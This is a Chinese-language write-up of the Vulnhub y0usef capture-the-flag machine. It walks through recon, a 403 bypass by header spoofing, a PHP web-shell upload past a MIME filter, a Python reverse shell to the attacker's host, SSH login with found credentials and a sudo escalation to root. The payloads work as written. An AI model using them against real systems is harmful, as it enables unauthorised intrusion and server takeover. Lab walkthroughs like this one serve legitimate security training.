Vulnhub-y0usef

y0usef

by：飞鸟(FeiNiao)

主机发现

arp-scan -l

目标是92

端口扫描

nmap太慢了使用masscan

./masscan --ports 1-10000 192.168.0.92

开了22 和 80 端口

对端口服务进行详细扫描

nmap -p22,80 -sV -sC 192.168.0.92

显示系统可能是Ubuntu的，开着ssh和apache服务

访问80端口

显示正在建站中~~~

手动访问robot.txt admin.php login.php 都没有

查看网页源代码也没有发现提示

指纹识别

whatweb http://192.168.0.92

apache ，Bootstrap框架，php语言，Ubuntu

目录扫描

dirsearch -u http://192.168.0.92

出现大量403拒绝访问，还有一个301

还是显示拒绝访问

使用burp尝试绕过403拒绝访问

绕过403的手段

使用旁站绕过
# Requset 
  GET /auth/login HTTP/1.1
  Host:www.abc.com
# Response
  HTTP/1.1 403 Forbidden

# Requset 
  GET /auth/login HTTP/1.1
  Host:$xxxx$.www.abc.com
# Response
  HTTP/1.1 200 ok
将主机名替换

覆盖url绕过
# Requset 
  GET /auth/login HTTP/1.1
# Response
  HTTP/1.1 403 Forbidden

# Requset 
  GET / HTTP/1.1
  X-Original-URL：/auth/login
# Response
  HTTP/1.1 200 ok
还有：X-Rewrite-URL: /auth/login  ReFerer：http://ip/auth/login

X-ip绕过
# Requset 
  GET /auth/login HTTP/1.1
# Response
  HTTP/1.1 403 Forbidden

# Requset 
  GET / HTTP/1.1
  Host: 192.168.0.92
  X-Forwarded-For: 127.0.0.1
# Response
  HTTP/1.1 200 ok

还有：
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1

使用X-Forwarded-For： 127.0.0.1绕过

添加 X-Forwarded-For: 127.0.0.1 访问发现有权限访问了

尝试弱口令 admin admin

继续添加X-Forwarded-For: 127.0.0.1

burp 放行每一步操作都要添加 X-Forwarded-For: 127.0.0.1

逛一逛，发现有个upload file的板块，可以进行文件上传

上传一句话

<?php $var=shell_exec($_GET['cmd']); echo $var ?>

没上传上去，不允许的类型，需要绕过限制

绕过方法：

更改后缀
mime检测
文件头

mime检测绕过

成功上传

uploadad files/1661422518shell.php

访问文件地址，别忘了xff

空页面，访问成功

执行代码http://192.168.0.92/adminstration/upload/files/1661422518shell.php?cmd=id

可以执行，看看有没有python nc等反弹shell工具

利用python反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.91",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

kali开启监听

成功反弹

寻找一番，看到flag，base编码了，去解码一下

啊这。。。。意外发现啊

ssh : 
user : yousef 
pass : yousef123

看看/etc/passwd中有哪些用户

可以ssh连接，ssh连接试试

登录成功，

权限提升

逛一番，有sudo权限

sudo -l 直接换成root账户

应该也是base，解码看看

okay！两个flag and root 权限

攻击方法：

主机发现 arp-scan -l 

端口扫描 nmap 

WEB信息收集 dirsearch

指纹探测 whatweb

弱口令 admin 

403 Bypass xff 

文件上传及绕过 mime 

base64编码

本地提权 sudo -s

PREVIOUSVulnhub-Admx_new

NEXTVulnhub-West-Wild-v1.1